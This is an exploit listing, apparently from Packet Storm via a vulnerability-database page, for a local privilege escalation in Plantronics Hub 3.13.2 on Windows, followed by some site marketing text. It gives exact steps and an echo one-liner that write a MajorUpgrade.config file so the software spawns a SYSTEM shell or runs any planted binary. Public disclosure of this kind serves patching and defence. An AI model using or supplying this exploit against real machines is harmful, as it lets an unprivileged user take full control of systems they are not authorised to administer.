Lucene search
K

Plantronics Hub 3.13.2 Local Privilege Escalation

🗓️ 03 Jan 2020 00:00:00Reported by Markus KrellType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 124 Views

Plantronics Hub 3.13.2 Local Privilege Escalation vulnerability and exploitatio

Code
`# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation  
# Date: 2020-01-2  
# Exploit Author: Markus Krell - @MarkusKrell  
# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf  
# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe  
# Version: Plantronics Hub for Windows prior to version 3.14  
# Tested on: Windows 10 Enterprise  
# CVE : N/A  
  
As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner:  
<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>  
  
Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session.   
You may of course call any other binary you can plant on the machine.  
  
Steps for exploitation (PoC):  
- Open cmd.exe   
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G  
- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation